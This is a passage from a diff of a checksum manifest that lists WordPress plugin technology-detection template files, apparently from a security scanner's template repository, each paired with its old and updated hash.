http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:8a1ffeea02ebeffc8410e9288bf030b3c5bada9d +http/technologies/wordpress/plugins/add-to-any.yaml:65204eaae7a13ab8a29bbf83da8d15e95e97c0d2 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:7ce1773d5efe1de4eeb7415ba09b9cd006dcd56b http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:d83a2498212efae38e2800f2738b94cc343e2004 +http/technologies/wordpress/plugins/akismet.yaml:2cecbeef3f952c39660b7ef526d993352e55f33e http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:82d3dc074be08b3cb3a127b3c5143033287c56c0 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:986e1854717daf515414c9a0c9d0c0496cb70f37 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:62e48a18cd7e1f7f2d2aa5f6947b5548f155a388 +http/technologies/wordpress/plugins/amp.yaml:aa062ccfe8a72aa5d2824678cd7f58f34f331e1c +http/technologies/wordpress/plugins/antispam-bee.yaml:f8038ff2bb03c79da607373e3c9a0c23c7f8bbf3 +http/technologies/wordpress/plugins/astra-sites.yaml:46efea6fca8b756b04ab348a85ada60c08bf5823 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:03a36d4b749ffe5c9b2a6782397b3363cf878304 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/autoptimize.yaml:920879237f499900baf2885e55366f40fd1483af +http/technologies/wordpress/plugins/backwpup.yaml:1b8555353f35ea9deeff6a99e0f27d5d6cdbf261 +http/technologies/wordpress/plugins/better-search-replace.yaml:85dece5faa6c7999a7c5b33f07e44fdee30bb9a6 +http/technologies/wordpress/plugins/better-wp-security.yaml:4cf414ce4912b124231ec5aaeb029b45efe6b944 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:5ed41ba8fd1aa09a8f551568c145d17b843810a6 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0105c127b0eb3f7d3db3f7383e20176d95594a9c +http/technologies/wordpress/plugins/breeze.yaml:9f3ced869567097600cffe638dfd84f1ee140413 +http/technologies/wordpress/plugins/broken-link-checker.yaml:721f1b1c567da662b80df839a2931ec1ff6bf07f +http/technologies/wordpress/plugins/child-theme-configurator.yaml:730f9ef6ac3b7d157b7602bc10bb245d90d0f035 +http/technologies/wordpress/plugins/classic-editor.yaml:4721378795bc8a655fb5f3fe347d06f1c014bb7e +http/technologies/wordpress/plugins/classic-widgets.yaml:7dbc9639154a49186a720e4b907e75840ccedb6f +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:a49bc127f4733bcbddc840ce8f4a346fa48e4079 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:dc2095558be073a2330fccfc86b78e385768ba6e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/copy-delete-posts.yaml:1c9bb377abbf336c9ab111f368f48d8f8ec3927c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:80ee9d72a05fa607b3bac8d43eaffdc294784889 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c5676cb3ffcf4cd88144a09e5d6acffcd2ce62f1 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:fdd2c32e4640843aacc4fce1d65a3175e32c988a -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13910c72122557903a40002d0f0dcd242980da26 +http/technologies/wordpress/plugins/cmb2.yaml:930d38a8a5c2d442f24e07ef808431102959d2c0 +http/technologies/wordpress/plugins/coblocks.yaml:cd60918bc5aae2fdf705003f59865bde969a3457 +http/technologies/wordpress/plugins/code-snippets.yaml:3467830f26bbaea226baf42c16e7d36452544604 +http/technologies/wordpress/plugins/coming-soon.yaml:30b84cb7f8135859a20ab4071a22fa65436dce8c +http/technologies/wordpress/plugins/complianz-gdpr.yaml:a68365cdd393a1f0137238174e6d7a30a00be4f1 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:8af5feb747e5e491e45eb8d65a9f2e65f16e824c +http/technologies/wordpress/plugins/contact-form-7.yaml:c0d94276a71f52550c7598ac5365301deee6c103 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:aefdbdbd22e5b639f9188adff52e12e09415c452 +http/technologies/wordpress/plugins/cookie-law-info.yaml:812a0895e545a2fb654d426694a10ee6d9d60e7a +http/technologies/wordpress/plugins/cookie-notice.yaml:34d945b71cb81ec86066ea42cfd474291d3cbd35 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:78aab014f51ae26689db95c7f12d336053db93a0 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:0fe9a0c706d46c2520ddc44e4dc1c7726c294acc +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:905cbda502aca1cfbfb2c43a6dad0c83a37c3911 +http/technologies/wordpress/plugins/custom-css-js.yaml:0b52c6c5e7c646ca3e0bfcbf4295825a13a8bad8 +http/technologies/wordpress/plugins/custom-fonts.yaml:4820659f1a78e1ca92c5b7dbc13b034cf50f2f23 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e2f29727528326bcd745fe9f3e6010dac33357f5 +http/technologies/wordpress/plugins/disable-comments.yaml:6a297643f3c8acb042ed8079cae90e653cbd9729 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:dc65e64aaf4dda3ce5f9a9b9bf94db5b277df75c +http/technologies/wordpress/plugins/duplicate-page.yaml:194b45e1155aa37d9daecb29ba6d3ce0c6105c97 +http/technologies/wordpress/plugins/duplicate-post.yaml:80fb969bafe6efb7e705beea053ab8656a403e1b +http/technologies/wordpress/plugins/duplicator.yaml:5431c482c496bb4d38e7ada3c5bae3952506743e +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:71c4bb2891c48141339f6e142fda2a7ce7d90660 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c64112a2a3423112f22659daf2845f7394e57725 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:fcb6316047b3cb92d6a79b6b3cd0bc5ec7410d8f -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:3a6a408c680afed419fd5cff87843d842fb53175 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:2f93216319633715b88eadfeb45c0e4f0fc1a9e7 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:db9313e5c1ba6ee717bdcaf28ca5bf4aef6282f4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:a31b8b49eea60051bd876cf32e59475aaa3ff693 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:48eacc6aacd78be7c671eef0841bb00ef61f7106 +http/technologies/wordpress/plugins/elementor.yaml:261fee5cd97285090662c5e96d1e077347278ccb +http/technologies/wordpress/plugins/elementskit-lite.yaml:42cc42e5f1a2e7f229cec13d7b7dd961f732a857 +http/technologies/wordpress/plugins/enable-media-replace.yaml:f2ac985ebd96134b67017ed092dfc1f2e1e24f1c +http/technologies/wordpress/plugins/envato-elements.yaml:b2c4a528d5152cdb19b15fd6ad86e45a9978bc8e +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:86a4fd5fde9ce5d625fdef512060d28f7e64fc12 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:0d41c7085613be2c4f978fa6de38b2c4db639a88 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:da887de998a2d3140d946cb6edd2e4c35374ec03 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:04cbb7400f97ae8f9792ea36e5ce8de9607a309f +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:ddb258cfb03b16e227993d7a34c47617b8a186e2 +http/technologies/wordpress/plugins/flamingo.yaml:4b7b9eaa67279c78b61f8f2bf4df1f3d2c7c20bc +http/technologies/wordpress/plugins/fluentform.yaml:05c9b19b7344c89d43f6b358d647e10f090190d4 +http/technologies/wordpress/plugins/font-awesome.yaml:5295de2e5d9bc772095d295a83e80119edb74d3f +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:651d68eef7c00f8e27f3e9e97dc19fb2d37f29c5 +http/technologies/wordpress/plugins/formidable.yaml:825506feb08e3306bee211b40205faed31c853ff +http/technologies/wordpress/plugins/forminator.yaml:778cd1f85e65f67a5e42ac0c3d1cbbd0567a6d7a +http/technologies/wordpress/plugins/ga-google-analytics.yaml:e833cc37470a831419f0a6fa5fd8657c02453290 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:a5fa92069ea6655fae0daf2c96d9215a1c99dee9 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:3b53a9061ddde675182310b95c8132e6f37c77c4 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:a45bcf85cbf4ef0f107270955a4c56fd867051d2 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:af1b0c3036eb3b8a44241cbe045c7991f6fbaac7 +http/technologies/wordpress/plugins/google-site-kit.yaml:6dac90752809e5a76de2b0b9f212e128b9f47012 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:a7acfea88662abcf2f92d22f881e83fa62064dab +http/technologies/wordpress/plugins/gtranslate.yaml:d4149d014ed2eda90cbdf3d96a61e8b1d5d73365 +http/technologies/wordpress/plugins/gutenberg.yaml:0b474bd1aa6e264ef66affcede2a69cc0a3c7b34 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:d2235b9046e5fe7a4ce1d3dbfb6189e61012706b http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/hostinger.yaml:5528d42fea5183ffda7073d1c116da79afb63cf3 -http/technologies/wordpress/plugins/image-optimization.yaml:fd00671fcb1a927454714d707e89e62b40f6a329 -http/technologies/wordpress/plugins/imagify.yaml:b82e202b7774603cc5dfc671f09e78399cd6a82b -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:e2398e4c0e2ea31019da3715d6aed35ccc0f6729 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:be5174a80ec6c119a05428acdc1218fac85a6795 -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:e24cc7910278443127c0ce363037f31575bb2be5 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:56b9044f69bd0ffba3e18ff4506cb7760768770d +http/technologies/wordpress/plugins/header-footer.yaml:caccd9f06378709ef686ed83f718e06816cd793a +http/technologies/wordpress/plugins/health-check.yaml:41e1993f9e9c4e508b532a629abbe74a644aeea4 +http/technologies/wordpress/plugins/hello-dolly.yaml:89a758f6e34a68383a5d1c6a305ebfd47b2700de +http/technologies/wordpress/plugins/host-webfonts-local.yaml:5dfe276a3bf942002b5b9145901d630ad24b785c +http/technologies/wordpress/plugins/hostinger.yaml:96a085cc974c4d1f7539d70587f5ef5f5838d7ab +http/technologies/wordpress/plugins/image-optimization.yaml:de715d2450149bf5068601e2c748bebfff2b98ff +http/technologies/wordpress/plugins/imagify.yaml:c3a1a829fa2f45243fe7b83fb8518f266df74f98 +http/technologies/wordpress/plugins/imsanity.yaml:89579568b145d726c7c0c60b784460558179a72f +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:7099027e840070568c841aceaa5118831d8f7225 +http/technologies/wordpress/plugins/instagram-feed.yaml:9a59c0e7c80f8dd1e187aa0bf1eddcc557226af6 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:902743122187f148f4804668a3264deb12f74c16 +http/technologies/wordpress/plugins/iwp-client.yaml:dc2b87a48b318aeff0927d798293da8ef7a9b54b +http/technologies/wordpress/plugins/jetpack-boost.yaml:21733bd995d9c7611450a49979e2ffdeab38a9ca +http/technologies/wordpress/plugins/jetpack.yaml:dcb7943b7c6e5389ac6d8c4b367b232ac16bc108 +http/technologies/wordpress/plugins/kadence-blocks.yaml:e3d892537f05e6195872f61314c2a5d7cb4c3975 +http/technologies/wordpress/plugins/kirki.yaml:fa9a1606d39daeead12d9fb2346898bde9d70017 +http/technologies/wordpress/plugins/leadin.yaml:d4a3032271f763de6aabc783e9fc0d800581d041 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:092e35e2b09f48da0e12a95983ab4ba77526c409 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:edeaddbfe056e60c585f511c8f93c86fe948b60c +http/technologies/wordpress/plugins/litespeed-cache.yaml:07fdfce745c02c26aec3719b5853f3a43573e252 +http/technologies/wordpress/plugins/loco-translate.yaml:590db3a5fa73e7664a57365f64204429b2161327 +http/technologies/wordpress/plugins/loginizer.yaml:6d580a667c507a95380ddf16223032a2d4622356 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:80de34e84d55586e5eda37d00d277aad7f4b2451 -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/metform.yaml:aaa8b95a995e3345112a288f66e705b150968e7e -http/technologies/wordpress/plugins/ml-slider.yaml:104ad761a31985f8f0947e3e0b9bf872fe1f2c2a -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:f00d03dc0f365956376cec268c45bd669729260e -http/technologies/wordpress/plugins/ninja-forms.yaml:cc29026bcd3c62478d5147fd80a8b3a560bfe728 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:b990fff1f3337e512694df82458fcf4d4f50c85c -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:62c476546e86bbb30a4bca834cb85031b7628020 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:b9a0f7dcfddd7597630325995baef0333d42b4ca +http/technologies/wordpress/plugins/mailpoet.yaml:9cfa5ba39c7fa38146786d3b15d3666784cf3632 +http/technologies/wordpress/plugins/maintenance.yaml:d40379c55c2d34867b0138cfcdcf90024ac29ca8 +http/technologies/wordpress/plugins/mainwp-child.yaml:9b1075a6c5640803dfa44253b14e3c25534b7451 +http/technologies/wordpress/plugins/malcare-security.yaml:825b0273f56a8122ed39d98fd6fc0c28860c30a4 +http/technologies/wordpress/plugins/megamenu.yaml:b7cf1279f0f006174205e34481f1d191077a0095 +http/technologies/wordpress/plugins/members.yaml:a3f2dd2d754a6c0a880579718710e2e17f54532d +http/technologies/wordpress/plugins/meta-box.yaml:153c669b1cfaa98702801cc9ab90168e32ca6762 +http/technologies/wordpress/plugins/metform.yaml:078e5bf5eee99a46d1ca3064ee36fe46fac3ed80 +http/technologies/wordpress/plugins/ml-slider.yaml:baa54792b3f82feff803304797ba59072121a34f +http/technologies/wordpress/plugins/newsletter.yaml:8bf92785a9f4bac26a516f0121f758503270204d +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:447d549e375554eb8e7c581c363c60ed1ba95afa +http/technologies/wordpress/plugins/nextgen-gallery.yaml:457624c7038156839010b13c9748a6276c14d242 +http/technologies/wordpress/plugins/ninja-forms.yaml:fc85a25cfdd48abb125fe5db9f80cb794d9a1be1 +http/technologies/wordpress/plugins/ocean-extra.yaml:5d33733ce1b1f23ace3d72e045e3fd0a52b6fd68 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:79f921fb57cf824024d30ba8f9032768de751af6 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:65836bf94e30ec24439a96c8dd89c4e5794c8619 +http/technologies/wordpress/plugins/optinmonster.yaml:e8ae9ede6e1dc751ad64829b58fdd407bb1dd242 +http/technologies/wordpress/plugins/otter-blocks.yaml:84963967d1ceebf0dd4e0eb343c2d189d954ed63 +http/technologies/wordpress/plugins/password-protected.yaml:6200802dbe8d11833cd071c7eeb350cf5f29f1e9 +http/technologies/wordpress/plugins/pdf-embedder.yaml:0d948a46f1ba0eff853611ae3018a54485bf0720 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:ba9797f8208c7c3ed5cb45048764d8ecd0a62835 -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:a722f3aca023da8a28f83c44fdca239658a068a4 +http/technologies/wordpress/plugins/pixelyoursite.yaml:f35a4292b3088ebff45ee0135482d5496afca232 +http/technologies/wordpress/plugins/polylang.yaml:785abef47bb44b5acac843ca9a7fdffe6c6d973b http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:0838742608b1265516017095ccd495332e6a5991 -http/technologies/wordpress/plugins/post-smtp.yaml:754dd57d96b6f4456c570c7034a2ddf3056539f4 -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:195ac372f24aa1feb8c48fba65a97149f05e137f -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:9f6476b40090f693001f2da81075d5b3e650c2e3 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d3871c6333178618d88df609d41ea9e626c1e312 -http/technologies/wordpress/plugins/sg-cachepress.yaml:557b4e350cd47eafc012c39dad25d48d6b397de0 -http/technologies/wordpress/plugins/sg-security.yaml:4d092558c2718bd98454bbec4adf942903cec393 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 -http/technologies/wordpress/plugins/simple-history.yaml:8441cfcd6437b914c70f78136d76cdeb85e261a0 